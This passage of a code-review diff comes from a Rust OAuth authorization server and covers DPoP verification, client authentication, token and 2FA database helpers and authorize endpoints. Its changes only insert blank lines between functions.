self.validate_metadata(&metadata)?; 219 Ok(metadata) 220 } 221 + 222 fn validate_metadata(&self, metadata: &ClientMetadata) -> Result<(), OAuthError> { 223 if metadata.redirect_uris.is_empty() { 224 return Err(OAuthError::InvalidClient( ··· 244 } 245 Ok(()) 246 } 247 + 248 pub fn validate_redirect_uri( 249 &self, 250 metadata: &ClientMetadata, ··· 257 } 258 Ok(()) 259 } 260 + 261 fn validate_redirect_uri_format(&self, uri: &str) -> Result<(), OAuthError> { 262 if uri.contains('#') { 263 return Err(OAuthError::InvalidClient( ··· 292 Ok(()) 293 } 294 } 295 + 296 impl ClientMetadata { 297 pub fn requires_dpop(&self) -> bool { 298 self.dpop_bound_access_tokens.unwrap_or(false) 299 } 300 + 301 pub fn auth_method(&self) -> &str { 302 self.token_endpoint_auth_method 303 .as_deref() 304 .unwrap_or("none") 305 } 306 } 307 + 308 pub async fn verify_client_auth( 309 cache: &ClientMetadataCache, 310 metadata: &ClientMetadata, ··· 338 ))), 339 } 340 } 341 + 342 async fn verify_private_key_jwt_async( 343 cache: &ClientMetadataCache, 344 metadata: &ClientMetadata, ··· 443 "client_assertion signature verification failed".to_string(), 444 )) 445 } 446 + 447 fn verify_es256( 448 key: &serde_json::Value, 449 signing_input: &str, ··· 475 .verify(signing_input.as_bytes(), &sig) 476 .map_err(|_| OAuthError::InvalidClient("ES256 signature verification failed".to_string())) 477 } 478 + 479 fn verify_es384( 480 key: &serde_json::Value, 481 signing_input: &str, ··· 507 .verify(signing_input.as_bytes(), &sig) 508 .map_err(|_| OAuthError::InvalidClient("ES384 signature verification failed".to_string())) 509 } 510 + 511 fn verify_rsa( 512 _alg: &str, 513 _key: &serde_json::Value, ··· 518 "RSA signature verification not yet supported - use EC keys".to_string(), 519 )) 520 } 521 + 522 fn verify_eddsa( 523 key: &serde_json::Value, 524 signing_input: &str,
+2
src/oauth/db/client.rs
··· 1 use sqlx::PgPool; 2 use super::super::{AuthorizedClientData, OAuthError}; 3 use super::helpers::{from_json, to_json}; 4 pub async fn upsert_authorized_client( 5 pool: &PgPool, 6 did: &str, ··· 22 .await?; 23 Ok(()) 24 } 25 pub async fn get_authorized_client( 26 pool: &PgPool, 27 did: &str,
··· 1 use sqlx::PgPool; 2 use super::super::{AuthorizedClientData, OAuthError}; 3 use super::helpers::{from_json, to_json}; 4 + 5 pub async fn upsert_authorized_client( 6 pool: &PgPool, 7 did: &str, ··· 23 .await?; 24 Ok(()) 25 } 26 + 27 pub async fn get_authorized_client( 28 pool: &PgPool, 29 did: &str,
+8
src/oauth/db/device.rs
··· 1 use chrono::{DateTime, Utc}; 2 use sqlx::PgPool; 3 use super::super::{DeviceData, OAuthError}; 4 pub struct DeviceAccountRow { 5 pub did: String, 6 pub handle: String, 7 pub email: Option<String>, 8 pub last_used_at: DateTime<Utc>, 9 } 10 pub async fn create_device( 11 pool: &PgPool, 12 device_id: &str, ··· 27 .await?; 28 Ok(()) 29 } 30 pub async fn get_device(pool: &PgPool, device_id: &str) -> Result<Option<DeviceData>, OAuthError> { 31 let row = sqlx::query!( 32 r#" ··· 45 last_seen_at: r.last_seen_at, 46 })) 47 } 48 pub async fn update_device_last_seen( 49 pool: &PgPool, 50 device_id: &str, ··· 61 .await?; 62 Ok(()) 63 } 64 pub async fn delete_device(pool: &PgPool, device_id: &str) -> Result<(), OAuthError> { 65 sqlx::query!( 66 r#" ··· 72 .await?; 73 Ok(()) 74 } 75 pub async fn upsert_account_device( 76 pool: &PgPool, 77 did: &str, ··· 90 .await?; 91 Ok(()) 92 } 93 pub async fn get_device_accounts( 94 pool: &PgPool, 95 device_id: &str, ··· 118 }) 119 .collect()) 120 } 121 pub async fn verify_account_on_device( 122 pool: &PgPool, 123 device_id: &str,
··· 1 use chrono::{DateTime, Utc}; 2 use sqlx::PgPool; 3 use super::super::{DeviceData, OAuthError}; 4 + 5 pub struct DeviceAccountRow { 6 pub did: String, 7 pub handle: String, 8 pub email: Option<String>, 9 pub last_used_at: DateTime<Utc>, 10 } 11 + 12 pub async fn create_device( 13 pool: &PgPool, 14 device_id: &str, ··· 29 .await?; 30 Ok(()) 31 } 32 + 33 pub async fn get_device(pool: &PgPool, device_id: &str) -> Result<Option<DeviceData>, OAuthError> { 34 let row = sqlx::query!( 35 r#" ··· 48 last_seen_at: r.last_seen_at, 49 })) 50 } 51 + 52 pub async fn update_device_last_seen( 53 pool: &PgPool, 54 device_id: &str, ··· 65 .await?; 66 Ok(()) 67 } 68 + 69 pub async fn delete_device(pool: &PgPool, device_id: &str) -> Result<(), OAuthError> { 70 sqlx::query!( 71 r#" ··· 77 .await?; 78 Ok(()) 79 } 80 + 81 pub async fn upsert_account_device( 82 pool: &PgPool, 83 did: &str, ··· 96 .await?; 97 Ok(()) 98 } 99 + 100 pub async fn get_device_accounts( 101 pool: &PgPool, 102 device_id: &str, ··· 125 }) 126 .collect()) 127 } 128 + 129 pub async fn verify_account_on_device( 130 pool: &PgPool, 131 device_id: &str,
+2
src/oauth/db/dpop.rs
··· 1 use sqlx::PgPool; 2 use super::super::OAuthError; 3 pub async fn check_and_record_dpop_jti( 4 pool: &PgPool, 5 jti: &str, ··· 16 .await?; 17 Ok(result.rows_affected() > 0) 18 } 19 pub async fn cleanup_expired_dpop_jtis( 20 pool: &PgPool, 21 max_age_secs: i64,
··· 1 use sqlx::PgPool; 2 use super::super::OAuthError; 3 + 4 pub async fn check_and_record_dpop_jti( 5 pool: &PgPool, 6 jti: &str, ··· 17 .await?; 18 Ok(result.rows_affected() > 0) 19 } 20 + 21 pub async fn cleanup_expired_dpop_jtis( 22 pool: &PgPool, 23 max_age_secs: i64,
+2
src/oauth/db/helpers.rs
··· 1 use serde::{de::DeserializeOwned, Serialize}; 2 use super::super::OAuthError; 3 pub fn to_json<T: Serialize>(value: &T) -> Result<serde_json::Value, OAuthError> { 4 serde_json::to_value(value).map_err(|e| { 5 tracing::error!("JSON serialization error: {}", e); 6 OAuthError::ServerError("Internal serialization error".to_string()) 7 }) 8 } 9 pub fn from_json<T: DeserializeOwned>(value: serde_json::Value) -> Result<T, OAuthError> { 10 serde_json::from_value(value).map_err(|e| { 11 tracing::error!("JSON deserialization error: {}", e);
··· 1 use serde::{de::DeserializeOwned, Serialize}; 2 use super::super::OAuthError; 3 + 4 pub fn to_json<T: Serialize>(value: &T) -> Result<serde_json::Value, OAuthError> { 5 serde_json::to_value(value).map_err(|e| { 6 tracing::error!("JSON serialization error: {}", e); 7 OAuthError::ServerError("Internal serialization error".to_string()) 8 }) 9 } 10 + 11 pub fn from_json<T: DeserializeOwned>(value: serde_json::Value) -> Result<T, OAuthError> { 12 serde_json::from_value(value).map_err(|e| { 13 tracing::error!("JSON deserialization error: {}", e);
+1
src/oauth/db/mod.rs
··· 5 mod request; 6 mod token; 7 mod two_factor; 8 pub use client::{get_authorized_client, upsert_authorized_client}; 9 pub use device::{ 10 create_device, delete_device, get_device, get_device_accounts, update_device_last_seen,
··· 5 mod request; 6 mod token; 7 mod two_factor; 8 + 9 pub use client::{get_authorized_client, upsert_authorized_client}; 10 pub use device::{ 11 create_device, delete_device, get_device, get_device_accounts, update_device_last_seen,
+6
src/oauth/db/request.rs
··· 1 use sqlx::PgPool; 2 use super::super::{AuthorizationRequestParameters, ClientAuth, OAuthError, RequestData}; 3 use super::helpers::{from_json, to_json}; 4 pub async fn create_authorization_request( 5 pool: &PgPool, 6 request_id: &str, ··· 30 .await?; 31 Ok(()) 32 } 33 pub async fn get_authorization_request( 34 pool: &PgPool, 35 request_id: &str, ··· 64 None => Ok(None), 65 } 66 } 67 pub async fn update_authorization_request( 68 pool: &PgPool, 69 request_id: &str, ··· 86 .await?; 87 Ok(()) 88 } 89 pub async fn consume_authorization_request_by_code( 90 pool: &PgPool, 91 code: &str, ··· 120 None => Ok(None), 121 } 122 } 123 pub async fn delete_authorization_request( 124 pool: &PgPool, 125 request_id: &str, ··· 134 .await?; 135 Ok(()) 136 } 137 pub async fn delete_expired_authorization_requests(pool: &PgPool) -> Result<u64, OAuthError> { 138 let result = sqlx::query!( 139 r#"
··· 1 use sqlx::PgPool; 2 use super::super::{AuthorizationRequestParameters, ClientAuth, OAuthError, RequestData}; 3 use super::helpers::{from_json, to_json}; 4 + 5 pub async fn create_authorization_request( 6 pool: &PgPool, 7 request_id: &str, ··· 31 .await?; 32 Ok(()) 33 } 34 + 35 pub async fn get_authorization_request( 36 pool: &PgPool, 37 request_id: &str, ··· 66 None => Ok(None), 67 } 68 } 69 + 70 pub async fn update_authorization_request( 71 pool: &PgPool, 72 request_id: &str, ··· 89 .await?; 90 Ok(()) 91 } 92 + 93 pub async fn consume_authorization_request_by_code( 94 pool: &PgPool, 95 code: &str, ··· 124 None => Ok(None), 125 } 126 } 127 + 128 pub async fn delete_authorization_request( 129 pool: &PgPool, 130 request_id: &str, ··· 139 .await?; 140 Ok(()) 141 } 142 + 143 pub async fn delete_expired_authorization_requests(pool: &PgPool) -> Result<u64, OAuthError> { 144 let result = sqlx::query!( 145 r#"
+12
src/oauth/db/token.rs
··· 2 use sqlx::PgPool; 3 use super::super::{OAuthError, TokenData}; 4 use super::helpers::{from_json, to_json}; 5 pub async fn create_token( 6 pool: &PgPool, 7 data: &TokenData, ··· 34 .await?; 35 Ok(row.id) 36 } 37 pub async fn get_token_by_id( 38 pool: &PgPool, 39 token_id: &str, ··· 68 None => Ok(None), 69 } 70 } 71 pub async fn get_token_by_refresh_token( 72 pool: &PgPool, 73 refresh_token: &str, ··· 105 None => Ok(None), 106 } 107 } 108 pub async fn rotate_token( 109 pool: &PgPool, 110 old_db_id: i32, ··· 149 tx.commit().await?; 150 Ok(()) 151 } 152 pub async fn check_refresh_token_used( 153 pool: &PgPool, 154 refresh_token: &str, ··· 163 .await?; 164 Ok(row) 165 } 166 pub async fn delete_token(pool: &PgPool, token_id: &str) -> Result<(), OAuthError> { 167 sqlx::query!( 168 r#" ··· 174 .await?; 175 Ok(()) 176 } 177 pub async fn delete_token_family(pool: &PgPool, db_id: i32) -> Result<(), OAuthError> { 178 sqlx::query!( 179 r#" ··· 185 .await?; 186 Ok(()) 187 } 188 pub async fn list_tokens_for_user( 189 pool: &PgPool, 190 did: &str, ··· 220 } 221 Ok(tokens) 222 } 223 pub async fn count_tokens_for_user(pool: &PgPool, did: &str) -> Result<i64, OAuthError> { 224 let count = sqlx::query_scalar!( 225 r#" ··· 231 .await?; 232 Ok(count) 233 } 234 pub async fn delete_oldest_tokens_for_user( 235 pool: &PgPool, 236 did: &str, ··· 253 .await?; 254 Ok(result.rows_affected()) 255 } 256 const MAX_TOKENS_PER_USER: i64 = 100; 257 pub async fn enforce_token_limit_for_user(pool: &PgPool, did: &str) -> Result<(), OAuthError> { 258 let count = count_tokens_for_user(pool, did).await?; 259 if count > MAX_TOKENS_PER_USER {
··· 2 use sqlx::PgPool; 3 use super::super::{OAuthError, TokenData}; 4 use super::helpers::{from_json, to_json}; 5 + 6 pub async fn create_token( 7 pool: &PgPool, 8 data: &TokenData, ··· 35 .await?; 36 Ok(row.id) 37 } 38 + 39 pub async fn get_token_by_id( 40 pool: &PgPool, 41 token_id: &str, ··· 70 None => Ok(None), 71 } 72 } 73 + 74 pub async fn get_token_by_refresh_token( 75 pool: &PgPool, 76 refresh_token: &str, ··· 108 None => Ok(None), 109 } 110 } 111 + 112 pub async fn rotate_token( 113 pool: &PgPool, 114 old_db_id: i32, ··· 153 tx.commit().await?; 154 Ok(()) 155 } 156 + 157 pub async fn check_refresh_token_used( 158 pool: &PgPool, 159 refresh_token: &str, ··· 168 .await?; 169 Ok(row) 170 } 171 + 172 pub async fn delete_token(pool: &PgPool, token_id: &str) -> Result<(), OAuthError> { 173 sqlx::query!( 174 r#" ··· 180 .await?; 181 Ok(()) 182 } 183 + 184 pub async fn delete_token_family(pool: &PgPool, db_id: i32) -> Result<(), OAuthError> { 185 sqlx::query!( 186 r#" ··· 192 .await?; 193 Ok(()) 194 } 195 + 196 pub async fn list_tokens_for_user( 197 pool: &PgPool, 198 did: &str, ··· 228 } 229 Ok(tokens) 230 } 231 + 232 pub async fn count_tokens_for_user(pool: &PgPool, did: &str) -> Result<i64, OAuthError> { 233 let count = sqlx::query_scalar!( 234 r#" ··· 240 .await?; 241 Ok(count) 242 } 243 + 244 pub async fn delete_oldest_tokens_for_user( 245 pool: &PgPool, 246 did: &str, ··· 263 .await?; 264 Ok(result.rows_affected()) 265 } 266 + 267 const MAX_TOKENS_PER_USER: i64 = 100; 268 + 269 pub async fn enforce_token_limit_for_user(pool: &PgPool, did: &str) -> Result<(), OAuthError> { 270 let count = count_tokens_for_user(pool, did).await?; 271 if count > MAX_TOKENS_PER_USER {
+9
src/oauth/db/two_factor.rs
··· 3 use sqlx::PgPool; 4 use uuid::Uuid; 5 use super::super::OAuthError; 6 pub struct TwoFactorChallenge { 7 pub id: Uuid, 8 pub did: String, ··· 12 pub created_at: DateTime<Utc>, 13 pub expires_at: DateTime<Utc>, 14 } 15 pub fn generate_2fa_code() -> String { 16 let mut rng = rand::thread_rng(); 17 let code: u32 = rng.gen_range(0..1_000_000); 18 format!("{:06}", code) 19 } 20 pub async fn create_2fa_challenge( 21 pool: &PgPool, 22 did: &str, ··· 47 expires_at: row.expires_at, 48 }) 49 } 50 pub async fn get_2fa_challenge( 51 pool: &PgPool, 52 request_uri: &str, ··· 71 expires_at: r.expires_at, 72 })) 73 } 74 pub async fn increment_2fa_attempts(pool: &PgPool, id: Uuid) -> Result<i32, OAuthError> { 75 let row = sqlx::query!( 76 r#" ··· 85 .await?; 86 Ok(row.attempts) 87 } 88 pub async fn delete_2fa_challenge(pool: &PgPool, id: Uuid) -> Result<(), OAuthError> { 89 sqlx::query!( 90 r#" ··· 96 .await?; 97 Ok(()) 98 } 99 pub async fn delete_2fa_challenge_by_request_uri( 100 pool: &PgPool, 101 request_uri: &str, ··· 110 .await?; 111 Ok(()) 112 } 113 pub async fn cleanup_expired_2fa_challenges(pool: &PgPool) -> Result<u64, OAuthError> { 114 let result = sqlx::query!( 115 r#" ··· 120 .await?; 121 Ok(result.rows_affected()) 122 } 123 pub async fn check_user_2fa_enabled(pool: &PgPool, did: &str) -> Result<bool, OAuthError> { 124 let row = sqlx::query!( 125 r#"
··· 3 use sqlx::PgPool; 4 use uuid::Uuid; 5 use super::super::OAuthError; 6 + 7 pub struct TwoFactorChallenge { 8 pub id: Uuid, 9 pub did: String, ··· 13 pub created_at: DateTime<Utc>, 14 pub expires_at: DateTime<Utc>, 15 } 16 + 17 pub fn generate_2fa_code() -> String { 18 let mut rng = rand::thread_rng(); 19 let code: u32 = rng.gen_range(0..1_000_000); 20 format!("{:06}", code) 21 } 22 + 23 pub async fn create_2fa_challenge( 24 pool: &PgPool, 25 did: &str, ··· 50 expires_at: row.expires_at, 51 }) 52 } 53 + 54 pub async fn get_2fa_challenge( 55 pool: &PgPool, 56 request_uri: &str, ··· 75 expires_at: r.expires_at, 76 })) 77 } 78 + 79 pub async fn increment_2fa_attempts(pool: &PgPool, id: Uuid) -> Result<i32, OAuthError> { 80 let row = sqlx::query!( 81 r#" ··· 90 .await?; 91 Ok(row.attempts) 92 } 93 + 94 pub async fn delete_2fa_challenge(pool: &PgPool, id: Uuid) -> Result<(), OAuthError> { 95 sqlx::query!( 96 r#" ··· 102 .await?; 103 Ok(()) 104 } 105 + 106 pub async fn delete_2fa_challenge_by_request_uri( 107 pool: &PgPool, 108 request_uri: &str, ··· 117 .await?; 118 Ok(()) 119 } 120 + 121 pub async fn cleanup_expired_2fa_challenges(pool: &PgPool) -> Result<u64, OAuthError> { 122 let result = sqlx::query!( 123 r#" ··· 128 .await?; 129 Ok(result.rows_affected()) 130 } 131 + 132 pub async fn check_user_2fa_enabled(pool: &PgPool, did: &str) -> Result<bool, OAuthError> { 133 let row = sqlx::query!( 134 r#"
+20
src/oauth/dpop.rs
··· 3 use chrono::Utc; 4 use serde::{Deserialize, Serialize}; 5 use sha2::{Digest, Sha256}; 6 use super::OAuthError; 7 const DPOP_NONCE_VALIDITY_SECS: i64 = 300; 8 const DPOP_MAX_AGE_SECS: i64 = 300; 9 #[derive(Debug, Clone)] 10 pub struct DPoPVerifyResult { 11 pub jkt: String, 12 pub jti: String, 13 } 14 #[derive(Debug, Clone, Serialize, Deserialize)] 15 pub struct DPoPProofHeader { 16 pub typ: String, 17 pub alg: String, 18 pub jwk: DPoPJwk, 19 } 20 #[derive(Debug, Clone, Serialize, Deserialize)] 21 pub struct DPoPJwk { 22 pub kty: String, ··· 27 #[serde(skip_serializing_if = "Option::is_none")] 28 pub y: Option<String>, 29 } 30 #[derive(Debug, Clone, Serialize, Deserialize)] 31 pub struct DPoPProofPayload { 32 pub jti: String, ··· 38 #[serde(skip_serializing_if = "Option::is_none")] 39 pub nonce: Option<String>, 40 } 41 pub struct DPoPVerifier { 42 secret: Vec<u8>, 43 } 44 impl DPoPVerifier { 45 pub fn new(secret: &[u8]) -> Self { 46 Self { 47 secret: secret.to_vec(), 48 } 49 } 50 pub fn generate_nonce(&self) -> String { 51 let timestamp = Utc::now().timestamp(); 52 let timestamp_bytes = timestamp.to_be_bytes(); ··· 59 nonce_data.extend_from_slice(&hash[..16]); 60 URL_SAFE_NO_PAD.encode(&nonce_data) 61 } 62 pub fn validate_nonce(&self, nonce: &str) -> Result<(), OAuthError> { 63 let nonce_bytes = URL_SAFE_NO_PAD 64 .decode(nonce) ··· 83 } 84 Ok(()) 85 } 86 pub fn verify_proof( 87 &self, 88 dpop_header: &str, ··· 152 }) 153 } 154 } 155 fn verify_dpop_signature( 156 alg: &str, 157 jwk: &DPoPJwk, ··· 168 ))), 169 } 170 } 171 fn verify_es256(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> { 172 use p256::ecdsa::signature::Verifier; 173 use p256::ecdsa::{Signature, VerifyingKey}; ··· 208 .verify(message, &sig) 209 .map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string())) 210 } 211 fn verify_es384(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> { 212 use p384::ecdsa::signature::Verifier; 213 use p384::ecdsa::{Signature, VerifyingKey}; ··· 248 .verify(message, &sig) 249 .map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string())) 250 } 251 fn verify_eddsa(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> { 252 use ed25519_dalek::{Signature, VerifyingKey}; 253 let crv = jwk.crv.as_ref().ok_or_else(|| { ··· 277 .verify_strict(message, &sig) 278 .map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string())) 279 } 280 pub fn compute_jwk_thumbprint(jwk: &DPoPJwk) -> Result<String, OAuthError> { 281 let canonical = match jwk.kty.as_str() { 282 "EC" => { ··· 319 let hash = hasher.finalize(); 320 Ok(URL_SAFE_NO_PAD.encode(&hash)) 321 } 322 pub fn compute_access_token_hash(access_token: &str) -> String { 323 let mut hasher = Sha256::new(); 324 hasher.update(access_token.as_bytes()); 325 let hash = hasher.finalize(); 326 URL_SAFE_NO_PAD.encode(&hash) 327 } 328 #[cfg(test)] 329 mod tests { 330 use super::*; 331 #[test] 332 fn test_nonce_generation_and_validation() { 333 let secret = b"test-secret-key-32-bytes-long!!!"; ··· 335 let nonce = verifier.generate_nonce(); 336 assert!(verifier.validate_nonce(&nonce).is_ok()); 337 } 338 #[test] 339 fn test_jwk_thumbprint_ec() { 340 let jwk = DPoPJwk {
··· 3 use chrono::Utc; 4 use serde::{Deserialize, Serialize}; 5 use sha2::{Digest, Sha256}; 6 + 7 use super::OAuthError; 8 + 9 const DPOP_NONCE_VALIDITY_SECS: i64 = 300; 10 const DPOP_MAX_AGE_SECS: i64 = 300; 11 + 12 #[derive(Debug, Clone)] 13 pub struct DPoPVerifyResult { 14 pub jkt: String, 15 pub jti: String, 16 } 17 + 18 #[derive(Debug, Clone, Serialize, Deserialize)] 19 pub struct DPoPProofHeader { 20 pub typ: String, 21 pub alg: String, 22 pub jwk: DPoPJwk, 23 } 24 + 25 #[derive(Debug, Clone, Serialize, Deserialize)] 26 pub struct DPoPJwk { 27 pub kty: String, ··· 32 #[serde(skip_serializing_if = "Option::is_none")] 33 pub y: Option<String>, 34 } 35 + 36 #[derive(Debug, Clone, Serialize, Deserialize)] 37 pub struct DPoPProofPayload { 38 pub jti: String, ··· 44 #[serde(skip_serializing_if = "Option::is_none")] 45 pub nonce: Option<String>, 46 } 47 + 48 pub struct DPoPVerifier { 49 secret: Vec<u8>, 50 } 51 + 52 impl DPoPVerifier { 53 pub fn new(secret: &[u8]) -> Self { 54 Self { 55 secret: secret.to_vec(), 56 } 57 } 58 + 59 pub fn generate_nonce(&self) -> String { 60 let timestamp = Utc::now().timestamp(); 61 let timestamp_bytes = timestamp.to_be_bytes(); ··· 68 nonce_data.extend_from_slice(&hash[..16]); 69 URL_SAFE_NO_PAD.encode(&nonce_data) 70 } 71 + 72 pub fn validate_nonce(&self, nonce: &str) -> Result<(), OAuthError> { 73 let nonce_bytes = URL_SAFE_NO_PAD 74 .decode(nonce) ··· 93 } 94 Ok(()) 95 } 96 + 97 pub fn verify_proof( 98 &self, 99 dpop_header: &str, ··· 163 }) 164 } 165 } 166 + 167 fn verify_dpop_signature( 168 alg: &str, 169 jwk: &DPoPJwk, ··· 180 ))), 181 } 182 } 183 + 184 fn verify_es256(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> { 185 use p256::ecdsa::signature::Verifier; 186 use p256::ecdsa::{Signature, VerifyingKey}; ··· 221 .verify(message, &sig) 222 .map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string())) 223 } 224 + 225 fn verify_es384(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> { 226 use p384::ecdsa::signature::Verifier; 227 use p384::ecdsa::{Signature, VerifyingKey}; ··· 262 .verify(message, &sig) 263 .map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string())) 264 } 265 + 266 fn verify_eddsa(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> { 267 use ed25519_dalek::{Signature, VerifyingKey}; 268 let crv = jwk.crv.as_ref().ok_or_else(|| { ··· 292 .verify_strict(message, &sig) 293 .map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string())) 294 } 295 + 296 pub fn compute_jwk_thumbprint(jwk: &DPoPJwk) -> Result<String, OAuthError> { 297 let canonical = match jwk.kty.as_str() { 298 "EC" => { ··· 335 let hash = hasher.finalize(); 336 Ok(URL_SAFE_NO_PAD.encode(&hash)) 337 } 338 + 339 pub fn compute_access_token_hash(access_token: &str) -> String { 340 let mut hasher = Sha256::new(); 341 hasher.update(access_token.as_bytes()); 342 let hash = hasher.finalize(); 343 URL_SAFE_NO_PAD.encode(&hash) 344 } 345 + 346 #[cfg(test)] 347 mod tests { 348 use super::*; 349 + 350 #[test] 351 fn test_nonce_generation_and_validation() { 352 let secret = b"test-secret-key-32-bytes-long!!!"; ··· 354 let nonce = verifier.generate_nonce(); 355 assert!(verifier.validate_nonce(&nonce).is_ok()); 356 } 357 + 358 #[test] 359 fn test_jwk_thumbprint_ec() { 360 let jwk = DPoPJwk {
+23
src/oauth/endpoints/authorize.rs
··· 11 use crate::state::{AppState, RateLimitKind}; 12 use crate::oauth::{Code, DeviceAccount, DeviceData, DeviceId, OAuthError, SessionId, db, templates}; 13 use crate::notifications::{NotificationChannel, channel_display_name, enqueue_2fa_code}; 14 const DEVICE_COOKIE_NAME: &str = "oauth_device_id"; 15 fn extract_device_cookie(headers: &HeaderMap) -> Option<String> { 16 headers 17 .get("cookie") ··· 26 None 27 }) 28 } 29 fn extract_client_ip(headers: &HeaderMap) -> String { 30 if let Some(forwarded) = headers.get("x-forwarded-for") { 31 if let Ok(value) = forwarded.to_str() { ··· 41 } 42 "0.0.0.0".to_string() 43 } 44 fn extract_user_agent(headers: &HeaderMap) -> Option<String> { 45 headers 46 .get("user-agent") 47 .and_then(|v| v.to_str().ok()) 48 .map(|s| s.to_string()) 49 } 50 fn make_device_cookie(device_id: &str) -> String { 51 format!( 52 "{}={}; Path=/oauth; HttpOnly; Secure; SameSite=Lax; Max-Age=31536000", ··· 54 device_id 55 ) 56 } 57 #[derive(Debug, Deserialize)] 58 pub struct AuthorizeQuery { 59 pub request_uri: Option<String>, 60 pub client_id: Option<String>, 61 pub new_account: Option<bool>, 62 } 63 #[derive(Debug, Serialize)] 64 pub struct AuthorizeResponse { 65 pub client_id: String, ··· 69 pub state: Option<String>, 70 pub login_hint: Option<String>, 71 } 72 #[derive(Debug, Deserialize)] 73 pub struct AuthorizeSubmit { 74 pub request_uri: String, ··· 77 #[serde(default)] 78 pub remember_device: bool, 79 } 80 #[derive(Debug, Deserialize)] 81 pub struct AuthorizeSelectSubmit { 82 pub request_uri: String, 83 pub did: String, 84 } 85 fn wants_json(headers: &HeaderMap) -> bool { 86 headers 87 .get("accept") ··· 89 .map(|accept| accept.contains("application/json")) 90 .unwrap_or(false) 91 } 92 pub async fn authorize_get( 93 State(state): State<AppState>, 94 headers: HeaderMap, ··· 216 request_data.parameters.login_hint.as_deref(), 217 )).into_response() 218 } 219 pub async fn authorize_get_json( 220 State(state): State<AppState>, 221 Query(query): Query<AuthorizeQuery>, ··· 239 login_hint: request_data.parameters.login_hint.clone(), 240 })) 241 } 242 pub async fn authorize_post( 243 State(state): State<AppState>, 244 headers: HeaderMap, ··· 441 redirect.into_response() 442 } 443 } 444 pub async fn authorize_select( 445 State(state): State<AppState>, 446 headers: HeaderMap, ··· 574 ); 575 Redirect::temporary(&redirect_url).into_response() 576 } 577 fn build_success_redirect(redirect_uri: &str, code: &str, state: Option<&str>) -> String { 578 let mut redirect_url = redirect_uri.to_string(); 579 let separator = if redirect_url.contains('?') { '&' } else { '?' }; ··· 586 redirect_url.push_str(&format!("&iss={}", url_encode(&format!("https://{}", pds_hostname)))); 587 redirect_url 588 } 589 #[derive(Debug, Serialize)] 590 pub struct AuthorizeDenyResponse { 591 pub error: String, 592 pub error_description: String, 593 } 594 pub async fn authorize_deny( 595 State(state): State<AppState>, 596 Form(form): Form<AuthorizeDenyForm>, ··· 610 } 611 Ok(Redirect::temporary(&redirect_url).into_response()) 612 } 613 #[derive(Debug, Deserialize)] 614 pub struct AuthorizeDenyForm { 615 pub request_uri: String, 616 } 617 #[derive(Debug, Deserialize)] 618 pub struct Authorize2faQuery { 619 pub request_uri: String, 620 pub channel: Option<String>, 621 } 622 #[derive(Debug, Deserialize)] 623 pub struct Authorize2faSubmit { 624 pub request_uri: String, 625 pub code: String, 626 } 627 const MAX_2FA_ATTEMPTS: i32 = 5; 628 pub async fn authorize_2fa_get( 629 State(state): State<AppState>, 630 Query(query): Query<Authorize2faQuery>, ··· 673 None, 674 )).into_response() 675 } 676 pub async fn authorize_2fa_post( 677 State(state): State<AppState>, 678 headers: HeaderMap,
··· 11 use crate::state::{AppState, RateLimitKind}; 12 use crate::oauth::{Code, DeviceAccount, DeviceData, DeviceId, OAuthError, SessionId, db, templates}; 13 use crate::notifications::{NotificationChannel, channel_display_name, enqueue_2fa_code}; 14 + 15 const DEVICE_COOKIE_NAME: &str = "oauth_device_id"; 16 + 17 fn extract_device_cookie(headers: &HeaderMap) -> Option<String> { 18 headers 19 .get("cookie") ··· 28 None 29 }) 30 } 31 + 32 fn extract_client_ip(headers: &HeaderMap) -> String { 33 if let Some(forwarded) = headers.get("x-forwarded-for") { 34 if let Ok(value) = forwarded.to_str() { ··· 44 } 45 "0.0.0.0".to_string() 46 } 47 + 48 fn extract_user_agent(headers: &HeaderMap) -> Option<String> { 49 headers 50 .get("user-agent") 51 .and_then(|v| v.to_str().ok()) 52 .map(|s| s.to_string()) 53 } 54 + 55 fn make_device_cookie(device_id: &str) -> String { 56 format!( 57 "{}={}; Path=/oauth; HttpOnly; Secure; SameSite=Lax; Max-Age=31536000", ··· 59 device_id 60 ) 61 } 62 + 63 #[derive(Debug, Deserialize)] 64 pub struct AuthorizeQuery { 65 pub request_uri: Option<String>, 66 pub client_id: Option<String>, 67 pub new_account: Option<bool>, 68 } 69 + 70 #[derive(Debug, Serialize)] 71 pub struct AuthorizeResponse { 72 pub client_id: String, ··· 76 pub state: Option<String>, 77 pub login_hint: Option<String>, 78 } 79 + 80 #[derive(Debug, Deserialize)] 81 pub struct AuthorizeSubmit { 82 pub request_uri: String, ··· 85 #[serde(default)] 86 pub remember_device: bool, 87 } 88 + 89 #[derive(Debug, Deserialize)] 90 pub struct AuthorizeSelectSubmit { 91 pub request_uri: String, 92 pub did: String, 93 } 94 + 95 fn wants_json(headers: &HeaderMap) -> bool { 96 headers 97 .get("accept") ··· 99 .map(|accept| accept.contains("application/json")) 100 .unwrap_or(false) 101 } 102 + 103 pub async fn authorize_get( 104 State(state): State<AppState>, 105 headers: HeaderMap, ··· 227 request_data.parameters.login_hint.as_deref(), 228 )).into_response() 229 } 230 + 231 pub async fn authorize_get_json( 232 State(state): State<AppState>, 233 Query(query): Query<AuthorizeQuery>, ··· 251 login_hint: request_data.parameters.login_hint.clone(), 252 })) 253 } 254 + 255 pub async fn authorize_post( 256 State(state): State<AppState>, 257 headers: HeaderMap, ··· 454 redirect.into_response() 455 } 456 } 457 + 458 pub async fn authorize_select( 459 State(state): State<AppState>, 460 headers: HeaderMap, ··· 588 ); 589 Redirect::temporary(&redirect_url).into_response() 590 } 591 + 592 fn build_success_redirect(redirect_uri: &str, code: &str, state: Option<&str>) -> String { 593 let mut redirect_url = redirect_uri.to_string(); 594 let separator = if redirect_url.contains('?') { '&' } else { '?' }; ··· 601 redirect_url.push_str(&format!("&iss={}", 